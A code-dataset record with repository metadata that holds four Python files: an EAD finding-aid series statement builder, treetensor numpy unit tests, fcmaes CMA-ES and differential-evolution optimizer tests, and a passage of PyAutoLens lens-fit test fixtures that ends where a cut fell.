632f4df0cdf0bff54927a00ad41302481206d4c2
| 6,302
|
py
|
Python
|
source/SpreadsheettoEAD/func/seriesstmt.py
|
gwiedeman/eadmachine
|
f6c0c0f92fc20ab6dcf4962fda827b7adb4749d4
|
[
"Unlicense"
] | 5
|
2016-01-25T15:27:12.000Z
|
2021-08-17T22:31:48.000Z
|
source/SpreadsheettoEAD/func/seriesstmt.py
|
gwiedeman/eadmachine
|
f6c0c0f92fc20ab6dcf4962fda827b7adb4749d4
|
[
"Unlicense"
] | null | null | null |
source/SpreadsheettoEAD/func/seriesstmt.py
|
gwiedeman/eadmachine
|
f6c0c0f92fc20ab6dcf4962fda827b7adb4749d4
|
[
"Unlicense"
] | null | null | null |
#module for Series Statement (<editionstmt>) for both <control> and <eadheader>
# Use when finding aid is part of a monograph series etc.
import xml.etree.cElementTree as ET
import globals
def seriesstmt(control_root, CSheet):
if CSheet.find('PartofSeries').text or CSheet.find('NumberinSeries').text:
if control_root.find('filedesc/seriesstmt') is None:
if "add_seriesstmt" in globals.new_elements or "add-all" in globals.add_all:
seriesstmt_par = control_root.find('filedesc')
seriesstmt_element = ET.Element('seriesstmt')
if control_root.find('filedesc/editionstmt') is None:
if control_root.find('filedesc/publicationstmt') is None:
series_index = 1
else:
series_index = 2
else:
if control_root.find('filedesc/publicationstmt') is None:
series_index = 2
else:
series_index = 3
seriesstmt_par.insert(series_index, seriesstmt_element)
if CSheet.find('PartofSeries').text:
series_title = ET.Element('titleproper')
seriesstmt_element.append(series_title)
series_title.text = CSheet.find('PartofSeries').text
if CSheet.find('NumberinSeries').text:
series_number = ET.Element('num')
seriesstmt_element.append(series_number)
series_number.text = CSheet.find('NumberinSeries').text
else:
if control_root.find('filedesc/seriesstmt/titleproper') is None or control_root.find('filedesc/seriesstmt/num') is None:
if control_root.find('filedesc/seriesstmt/p') is None:
if control_root.find('filedesc/seriesstmt/titleproper') is None:
#<num> only
if CSheet.find('NumberinSeries').text:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text + " - " + CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
else:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/num').text = ""
else:
#<titleproper> only
if CSheet.find('NumberinSeries').text:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('NumberinSeries').text + " - " + CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('NumberinSeries').text
else:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
else:
if control_root.find('filedesc/seriesstmt/titleproper') is None:
if control_root.find('filedesc/seriesstmt/num') is None:
#<p> only
if CSheet.find('NumberinSeries').text:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('NumberinSeries').text + " - " + CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('NumberinSeries').text
else:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/p').text = ""
else:
# <p> and <num>
if CSheet.find('NumberinSeries').text:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
control_root.find('filedesc/seriesstmt/p').text = ""
else:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/num').text = ""
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/num').text = ""
control_root.find('filedesc/seriesstmt/p').text = ""
else:
# <titleproper> and <p>
if CSheet.find('PartofSeries').text:
if CSheet.find('NumberinSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('NumberinSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
control_root.find('filedesc/seriesstmt/p').text = ""
else:
if CSheet.find('NumberinSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('NumberinSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
control_root.find('filedesc/seriesstmt/p').text = ""
else:
if control_root.find('filedesc/seriesstmt/p') is None:
pass
else:
control_root.find('filedesc/seriesstmt/p').text = ""
#uses both <titleproper> and <num>
if CSheet.find('PartofSeries').text:
if CSheet.find('NumberinSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
control_root.find('filedesc/seriesstmt/num').text = ""
else:
if CSheet.find('NumberinSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
control_root.find('filedesc/seriesstmt/num').text = ""
else:
if control_root.find('filedesc/seriesstmt') is None:
pass
else:
control_root.find('filedesc/seriesstmt').clear()
| 49.234375
| 145
| 0.68264
| 735
| 6,302
| 5.755102
| 0.084354
| 0.135225
| 0.180851
| 0.277305
| 0.864539
| 0.827187
| 0.826241
| 0.818203
| 0.777305
| 0.710638
| 0
| 0.000768
| 0.17312
| 6,302
| 128
| 146
| 49.234375
| 0.810977
| 0.037924
| 0
| 0.789916
| 0
| 0
| 0.315555
| 0.189894
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008403
| false
| 0.016807
| 0.016807
| 0
| 0.02521
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6330922940ed646135b43f6ed324255ff3f20a95
| 3,828
|
py
|
Python
|
test/numpy/test_funcs.py
|
opendilab/DI-treetensor
|
fe5f681123c3d6e8d7507fba38586d2edf12e693
|
[
"Apache-2.0"
] | 45
|
2021-09-04T15:57:44.000Z
|
2022-03-11T19:28:56.000Z
|
test/numpy/test_funcs.py
|
opendilab/DI-treetensor
|
fe5f681123c3d6e8d7507fba38586d2edf12e693
|
[
"Apache-2.0"
] | 7
|
2021-09-06T13:06:12.000Z
|
2022-03-03T13:38:05.000Z
|
test/numpy/test_funcs.py
|
opendilab/DI-treetensor
|
fe5f681123c3d6e8d7507fba38586d2edf12e693
|
[
"Apache-2.0"
] | 1
|
2021-09-30T15:18:06.000Z
|
2021-09-30T15:18:06.000Z
|
import numpy as np
import pytest
import treetensor.numpy as tnp
# noinspection DuplicatedCode
@pytest.mark.unittest
class TestNumpyFuncs:
_DEMO_1 = tnp.ndarray({
'a': np.array([[1, 2, 3], [5, 6, 7]]),
'b': np.array([1, 3, 5, 7]),
'x': {
'c': np.array([3, 5, 7]),
'd': np.array([[7, 9]]),
}
})
_DEMO_2 = tnp.ndarray({
'a': np.array([[1, 2, 3], [5, 6, 8]]),
'b': np.array([1, 3, 5, 7]),
'x': {
'c': np.array([3, 5, 7]),
'd': np.array([[7, 9]]),
}
})
_DEMO_3 = tnp.ndarray({
'a': np.array([[1, 2, 3], [5, 6, 7]]),
'b': np.array([1, 3, 5, 7]),
'x': {
'c': np.array([3, 5, 7]),
'd': np.array([[7, 9]]),
}
})
def test_all(self):
assert tnp.all(np.array([True, True, True]))
assert not tnp.all(np.array([True, True, False]))
assert not tnp.all(np.array([False, False, False]))
assert tnp.all(tnp.ndarray({
'a': np.array([True, True, True]),
'b': np.array([True, True, True]),
}))
assert not tnp.all(tnp.ndarray({
'a': np.array([True, True, True]),
'b': np.array([True, True, False]),
}))
assert not tnp.all(tnp.ndarray({
'a': np.array([False, False, False]),
'b': np.array([False, False, False]),
}))
def test_any(self):
assert tnp.any(np.array([True, True, True]))
assert tnp.any(np.array([True, True, False]))
assert not tnp.any(np.array([False, False, False]))
assert tnp.any(tnp.ndarray({
'a': np.array([True, True, True]),
'b': np.array([True, True, True]),
}))
assert tnp.any(tnp.ndarray({
'a': np.array([True, True, True]),
'b': np.array([True, True, False]),
}))
assert not tnp.any(tnp.ndarray({
'a': np.array([False, False, False]),
'b': np.array([False, False, False]),
}))
def test_equal(self):
assert tnp.all(tnp.equal(
np.array([1, 2, 3]),
np.array([1, 2, 3]),
))
assert not tnp.all(tnp.equal(
np.array([1, 2, 3]),
np.array([1, 2, 4]),
))
assert tnp.all(
tnp.equal(self._DEMO_1, self._DEMO_2) == tnp.ndarray({
'a': np.array([[True, True, True], [True, True, False]]),
'b': np.array([True, True, True, True]),
'x': {
'c': np.array([True, True, True]),
'd': np.array([[True, True]]),
}
})
)
assert tnp.all(
tnp.equal(self._DEMO_1, self._DEMO_3) == tnp.ndarray({
'a': np.array([[True, True, True], [True, True, True]]),
'b': np.array([True, True, True, True]),
'x': {
'c': np.array([True, True, True]),
'd': np.array([[True, True]]),
}
})
)
def test_array_equal(self):
assert tnp.all(tnp.array_equal(
np.array([1, 2, 3]),
np.array([1, 2, 3]),
))
assert not tnp.all(tnp.array_equal(
np.array([1, 2, 3]),
np.array([1, 2, 4]),
))
assert tnp.array_equal(self._DEMO_1, self._DEMO_2) == tnp.ndarray({
'a': False,
'b': True,
'x': {
'c': True,
'd': True,
}
})
assert tnp.array_equal(self._DEMO_1, self._DEMO_3) == tnp.ndarray({
'a': True,
'b': True,
'x': {
'c': True,
'd': True,
}
})
| 29.446154
| 75
| 0.416667
| 475
| 3,828
| 3.292632
| 0.084211
| 0.205882
| 0.161125
| 0.191816
| 0.888107
| 0.888107
| 0.86509
| 0.803708
| 0.783887
| 0.696931
| 0
| 0.034057
| 0.386364
| 3,828
| 129
| 76
| 29.674419
| 0.631758
| 0.007053
| 0
| 0.634783
| 0
| 0
| 0.012372
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 1
| 0.034783
| false
| 0
| 0.026087
| 0
| 0.095652
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2d5ecfcaa100e55b0bc2860eaf53801d4b4d29b1
| 13,025
|
py
|
Python
|
venv/Lib/site-packages/fcmaes/test_cma.py
|
StuartMolnar/Whale-Optimization
|
05ebebdb3c676768f8fe6a0e7e7d3c18f70162d2
|
[
"Apache-2.0"
] | null | null | null |
venv/Lib/site-packages/fcmaes/test_cma.py
|
StuartMolnar/Whale-Optimization
|
05ebebdb3c676768f8fe6a0e7e7d3c18f70162d2
|
[
"Apache-2.0"
] | null | null | null |
venv/Lib/site-packages/fcmaes/test_cma.py
|
StuartMolnar/Whale-Optimization
|
05ebebdb3c676768f8fe6a0e7e7d3c18f70162d2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Dietmar Wolz.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory.
import sys
import multiprocessing as mp
import numpy as np
from scipy.optimize import OptimizeResult
from fcmaes.testfun import Wrapper, Rosen, Rastrigin, Eggholder
from fcmaes import cmaes, de, cmaescpp, gcldecpp, retry, advretry
def test_rastrigin_python():
popsize = 100
dim = 3
testfun = Rastrigin(dim)
sdevs = [1.0]*dim
max_eval = 100000
limit = 0.00001
# stochastic optimization may fail the first time
for _ in range(5):
# use a wrapper to monitor function evaluations
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval, popsize=popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval / popsize + 2 > ret.nit) # too much iterations
assert(ret.status == 4) # wrong cma termination code
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_python():
popsize = 31
dim = 5
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 100000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval, popsize=popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval / popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_ask_tell():
popsize = 31
dim = 5
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 100000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
es = cmaes.Cmaes(testfun.bounds,
popsize = popsize, input_sigma = sdevs)
iters = max_eval // popsize
for j in range(iters):
xs = es.ask()
ys = [wrapper.eval(x) for x in xs]
stop = es.tell(ys)
if stop != 0:
break
ret = OptimizeResult(x=es.best_x, fun=es.best_value,
nfev=wrapper.get_count(),
nit=es.iterations, status=es.stop)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval / popsize + 2 > ret.nit) # too much iterations
# assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
# assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_cpp():
popsize = 31
dim = 5
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 100000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaescpp.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval, popsize=popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_parallel():
popsize = 8
dim = 2
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval,
popsize=popsize, workers = mp.cpu_count())
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_delayed():
popsize = 8
dim = 2
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval,
popsize=popsize, workers = popsize, delayed_update=True)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
# assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
# assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
# assert(almost_equal(ret.fun, wrapper.get_best_y())) # wrong best y returned
def test_rosen_cpp_parallel():
popsize = 8
dim = 2
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaescpp.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval,
popsize=popsize, workers = mp.cpu_count())
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_gclde_parallel():
popsize = 8
dim = 2
testfun = Rosen(dim)
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = gcldecpp.minimize(wrapper.eval, dim, testfun.bounds,
max_evaluations = max_eval,
popsize=popsize, workers = mp.cpu_count())
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_de():
popsize = 8
dim = 2
testfun = Rosen(dim)
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = de.minimize(wrapper.eval, dim, testfun.bounds,
max_evaluations = max_eval,
popsize=popsize, workers = None)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + 2*popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_de_delayed():
popsize = 8
dim = 2
testfun = Rosen(dim)
max_eval = 10000
limit = 0.01
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = de.minimize(wrapper.eval, dim, testfun.bounds,
max_evaluations = max_eval,
popsize=popsize, workers = popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
# assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
# assert(almost_equal(ret.fun, wrapper.get_best_y())) # wrong best y returned
def test_rosen_ask_tell_de():
popsize = 8
dim = 2
testfun = Rosen(dim)
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
es = de.DE(dim, testfun.bounds, popsize = popsize)
iters = max_eval // popsize
for j in range(iters):
xs = es.ask()
ys = [wrapper.eval(x) for x in xs]
stop = es.tell(ys, xs)
if stop != 0:
break
ret = OptimizeResult(x=es.best_x, fun=es.best_value,
nfev=wrapper.get_count(),
nit=es.iterations, status=es.stop)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + 2*popsize >= ret.nfev) # too much function calls
assert(max_eval / popsize + 2 > ret.nit) # too much iterations
# assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
# assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_eggholder_python():
popsize = 1000
dim = 2
testfun = Eggholder()
# use a wrapper to monitor function evaluations
sdevs = [1.0]*dim
max_eval = 100000
limit = -800
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval, popsize=popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_eggholder_retry():
dim = 2
testfun = Eggholder()
limit = -956
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = retry.minimize(wrapper.eval, testfun.bounds,
num_retries=100)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_eggholder_advanced_retry():
dim = 2
testfun = Eggholder()
limit = -956
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = advretry.minimize(wrapper.eval, testfun.bounds,
num_retries=300)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(almost_equal(ret.fun, wrapper.get_best_y())) # wrong best y returned
def almost_equal(X1, X2):
if np.isscalar(X1):
X1 = [X1]
X2 = [X2]
if len(X1) != len(X2):
return False
eps = 1E-5
for i in range(len(X1)):
a = X1[i]
b = X2[i]
if abs(a) < eps or abs(b) < eps:
if abs(a - b) > eps:
return False
else:
if abs(a / b - 1 > eps):
return False
return True
| 38.084795
| 87
| 0.611977
| 1,731
| 13,025
| 4.482958
| 0.084922
| 0.041495
| 0.057732
| 0.051546
| 0.898325
| 0.898325
| 0.898325
| 0.877448
| 0.870103
| 0.870103
| 0
| 0.025531
| 0.287294
| 13,025
| 341
| 88
| 38.196481
| 0.810406
| 0.214664
| 0
| 0.809028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.236111
| 1
| 0.052083
| false
| 0
| 0.020833
| 0
| 0.086806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2db8cf621b087a78c6127048a336d6812320f848
| 67,176
|
py
|
Python
|
test/lens/test_lens_fit.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
test/lens/test_lens_fit.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
test/lens/test_lens_fit.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
from autofit.tools import fit_util
from autolens.data import ccd
from autolens.data.array import scaled_array
from autolens.data.array import mask as msk
from autolens.model.galaxy import galaxy as g
from autolens.lens.util import lens_fit_util as util
from autolens.lens import ray_tracing, lens_fit
from autolens.lens import lens_data as ld
from autolens.model.profiles import light_profiles as lp
from autolens.model.profiles import mass_profiles as mp
from autolens.model.inversion import pixelizations
from autolens.model.inversion import regularization
from autolens.model.inversion import inversions
from test.mock.mock_profiles import MockLightProfile
from test.mock.mock_lens import MockTracer
from test.mock.mock_galaxy import MockHyperGalaxy
@pytest.fixture(name='lens_data_blur')
def make_lens_data_blur():
image = np.array([[0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0]])
psf = ccd.PSF(array=(np.array([[1.0, 1.0, 1.0],
[1.0, 1.0, 1.0],
[1.0, 1.0, 1.0]])), pixel_scale=1.0, renormalize=False)
ccd_data = ccd.CCDData(image, pixel_scale=1.0, psf=psf, noise_map=np.ones((4, 4)))
mask = np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]])
mask = msk.Mask(array=mask, pixel_scale=1.0)
return ld.LensData(ccd_data, mask, sub_grid_size=1)
@pytest.fixture(name='lens_data_manual')
def make_li_manual():
image = np.array([[0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 2.0, 3.0, 0.0],
[0.0, 4.0, 5.0, 6.0, 0.0],
[0.0, 7.0, 8.0, 9.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0]])
psf = ccd.PSF(array=(np.array([[1.0, 5.0, 9.0],
[2.0, 5.0, 1.0],
[3.0, 4.0, 0.0]])), pixel_scale=1.0)
image = ccd.CCDData(image, pixel_scale=1.0, psf=psf, noise_map=np.ones((5, 5)))
mask = msk.Mask(array=np.array([[True, True, True, True, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, True, True, True, True]]), pixel_scale=1.0)
return ld.LensData(image, mask, sub_grid_size=1)
@pytest.fixture(name='hyper')
def make_hyper():
class Hyper(object):
def __init__(self):
pass
hyper = Hyper()
hyper.hyper_model_image = np.array([[1.0, 3.0, 5.0, 7.0],
[7.0, 9.0, 8.0, 1.0],
[6.0, 4.0, 0.0, 9.0],
[3.0, 4.0, 5.0, 6.0]])
hyper.hyper_galaxy_images = [np.array([[1.0, 3.0, 5.0, 4.0],
[7.0, 9.0, 8.0, 9.0],
[6.0, 4.0, 0.0, 3.0],
[6.0, 2.0, 3.0, 2.0]]),
np.array([[1.0, 3.0, 5.0, 1.0],
[7.0, 9.0, 8.0, 2.0],
[6.0, 4.0, 0.0, 3.0],
[1.0, 3.0, 4.0, 1.0]])]
hyper.hyper_minimum_values = [0.2, 0.8]
return hyper
@pytest.fixture(name='lens_data_hyper_no_blur')
def make_li_hyper_no_blur(hyper):
image = np.array([[0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0]])
psf = ccd.PSF(array=(np.array([[0.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 0.0]])), pixel_scale=1.0, renormalize=False)
ccd_data = ccd.CCDData(image, pixel_scale=1.0, psf=psf, noise_map=np.ones((4, 4)))
mask = np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]])
mask = msk.Mask(array=mask, pixel_scale=1.0)
return ld.LensDataHyper(ccd_data, mask, hyper_model_image=hyper.hyper_model_image,
hyper_galaxy_images=hyper.hyper_galaxy_images,
hyper_minimum_values=hyper.hyper_minimum_values, sub_grid_size=1)
@pytest.fixture(name='lens_data_hyper_manual')
def make_li_hyper_manual(hyper):
image = np.array([[0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 2.0, 3.0, 0.0],
[0.0, 4.0, 5.0, 6.0, 0.0],
[0.0, 7.0, 8.0, 9.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0]])
psf = ccd.PSF(array=(np.array([[1.0, 5.0, 9.0],
[2.0, 5.0, 1.0],
[3.0, 4.0, 0.0]])), pixel_scale=1.0)
ccd_data = ccd.CCDData(image, pixel_scale=1.0, psf=psf, noise_map=np.ones((5, 5)))
mask = msk.Mask(array=np.array([[True, True, True, True, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, True, True, True, True]]), pixel_scale=1.0)
return ld.LensDataHyper(ccd_data, mask, hyper_model_image=hyper.hyper_model_image,
hyper_galaxy_images=hyper.hyper_galaxy_images,
hyper_minimum_values=hyper.hyper_minimum_values, sub_grid_size=1)
class TestAbstractLensFit:
class TestAbstractLogic:
def test__logic_in_abstract_fit(self, lens_data_manual):
galaxy_light = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[galaxy_light],
image_plane_grid_stack=lens_data_manual.grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_manual.psf,
map_to_scaled_array=lens_data_manual.map_to_scaled_array)
assert fit.total_inversions == 0
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g.Galaxy(pixelization=pixelizations.Rectangular(),
regularization=regularization.Constant())],
image_plane_grid_stack=lens_data_manual.grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_manual.psf,
map_to_scaled_array=lens_data_manual.map_to_scaled_array)
assert fit.total_inversions == 1
class TestUnmaskedModelImage:
def test__padded_tracer_is_none__unmasked_model_images_return_none(self, lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert fit.unmasked_model_image == None
def test__padded_tracer_input__all_planes_have_light_profiles__unmasked_model_image_returns_array(self,
lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
